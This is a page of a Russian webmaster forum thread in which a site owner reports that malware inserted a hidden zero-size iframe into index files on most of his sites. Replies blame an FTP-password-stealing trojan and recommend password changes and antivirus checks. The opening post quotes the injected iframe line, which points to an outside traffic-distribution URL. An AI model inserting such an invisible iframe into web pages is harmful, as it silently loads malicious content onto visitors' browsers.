Проверяйте все свои сайты, чтобы не попасть в бан.

12 3
Ilya_1982
На сайте с 03.11.2006
Offline
101
2447

Сегодн обнаружил, что на 79% моих проектов вирус на выходных добавил строку с скрытыми слоями в index.php и index.html файлы.

Строка следующего вида

<iframe src="http://traffmanager.org/tds/iframe.php" width="0" height="0" style="display:none"></iframe>

Уже читал раньше о таком вирусе. Рекомендую проверить все проекты, что бы не попасть в бан.

Кстати, очень интересный ответ дали в одной известной хостинговой компании относительно моего письма им о вирусе:

-----

Здравствуйте. Ваш сайт был взломан вирусом. На наших серверах нету

вируса, в противном случае взломали бы не только Вас но и всех остальных

клиентов. Мы рекомендуем Вам заказывать сайты у профессионалов. С случае

использование популярных движков, проверяйте обновления у создателя

движка или в buqtrack'аx.

-----

Я, почему-то, с ними не согласен.

Megavolt
На сайте с 23.12.2005
Offline
179
#1

правильный ответ дали, совершенно с ними согласен.

p.s. объясните мне, почему вы пользуетесь ИЕ?

Иногда лучше жевать.... (С)
Ilya_1982
На сайте с 03.11.2006
Offline
101
#2
Megavolt:
правильный ответ дали, совершенно с ними согласен.


p.s. объясните мне, почему вы пользуетесь ИЕ?

ИЕ - это Интернет Эксплорер? Я пользуюсь Оперой.

А если это по поводу движка, то на этих проектах был не ИЕ движок.

T
На сайте с 27.06.2006
Offline
179
#3

Скорее всего троян из FTP-менеджера спёр пароли.

Хостер возможно действительно не виноват.

ps: А вообще, при чём тут ЯНДЕКС ? :)

K
На сайте с 06.05.2007
Offline
20
#4

Пол месяца назад был и у меня такой случай: через iframe подгружалось - всякого мусора :(

как оказалось - у людей (те которые имели ftp доступ) на компьютере не стоял антивирус :)))

троян нашел пароли, которые были забиты через Тотал командер и куда их переслал, и после этого сайтик... в общем плохо было

в общем всего то - поменять пароль и пока на это всё, да и обновить антивирус, и провериь компьютеры на трояны )

-

первый блин всегда квадратом
Ilya_1982
На сайте с 03.11.2006
Offline
101
#5
Trump:
Скорее всего троян из FTP-менеджера спёр пароли.
Хостер возможно действительно не виноват.

ps: А вообще, при чём тут ЯНДЕКС ? :)

Ну потому что Яндекс может в бан занести за скрыте слои.

T.R.O.N
На сайте с 18.05.2004
Offline
314
#6

Ilya_1982,

сначала поднимите логи фтп, потом проверьте себя, скорее всего у вас тороян.

потом дайте в лоб хостеру.

И еще, больше думайте не о бане, а о том что с Ваших сайтов люди могли схватить такую гадость(даже без Вашего участия.)

От воздержания пока никто не умер. Хотя никто и не родился! Prototype.js был написан теми, кто не знает JavaScript, для тех, кто не знает JavaScript (Richard Cornford)
Julka25
На сайте с 06.01.2005
Offline
30
#7
Megavolt:
p.s. объясните мне, почему вы пользуетесь ИЕ?

Скажите, а как влияет использования ИЕ на заражение вирусами? Спасибо

Спасибо за внимание!
Ilya_1982
На сайте с 03.11.2006
Offline
101
#8
T.R.O.N:
Ilya_1982,
сначала поднимите логи фтп, потом проверьте себя, скорее всего у вас тороян.
потом дайте в лоб хостеру.
И еще, больше думайте не о бане, а о том что с Ваших сайтов люди могли схватить такую гадость(даже без Вашего участия.)

Ага.. все сейчас проверяю меняю и т.д.

Пост был расчитан на то, чтобы люди еще раз проверили сайты свои, а нету ли такого у них.

Оборотень в погонах
На сайте с 19.03.2007
Offline
3

format c:

и смена паролей фтп - самое лучшее в данной ситуации...

- - - - - - - - - - - - - - -
Soniya
На сайте с 05.11.2004
Offline
42
#10
Ilya_1982:
Сегодн обнаружил, что на 79% моих проектов вирус на выходных добавил строку с скрытыми слоями в index.php и index.html файлы.

Строка следующего вида
<iframe src="http://traffmanager.org/tds/iframe.php" width="0" height="0" style="display:none"></iframe>


Уже читал раньше о таком вирусе. Рекомендую проверить все проекты, что бы не попасть в бан.



Кстати, очень интересный ответ дали в одной известной хостинговой компании относительно моего письма им о вирусе:

-----
Здравствуйте. Ваш сайт был взломан вирусом. На наших серверах нету
вируса, в противном случае взломали бы не только Вас но и всех остальных
клиентов. Мы рекомендуем Вам заказывать сайты у профессионалов. С случае
использование популярных движков, проверяйте обновления у создателя
движка или в buqtrack'аx.
-----

Я, почему-то, с ними не согласен.

Сидит гадость в system 32. Пролазит через отверстие в инет эксплойере и в нем же прописывается. Тащит пароли не только с фтп и отправляет их по емейлу куму нужно. Удаляется быстро - ручками. Эксплойер нужно будет после процедуры удаления переписать новым.

Размещу ваши статьи на тему "Путешествия, Отдых"
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий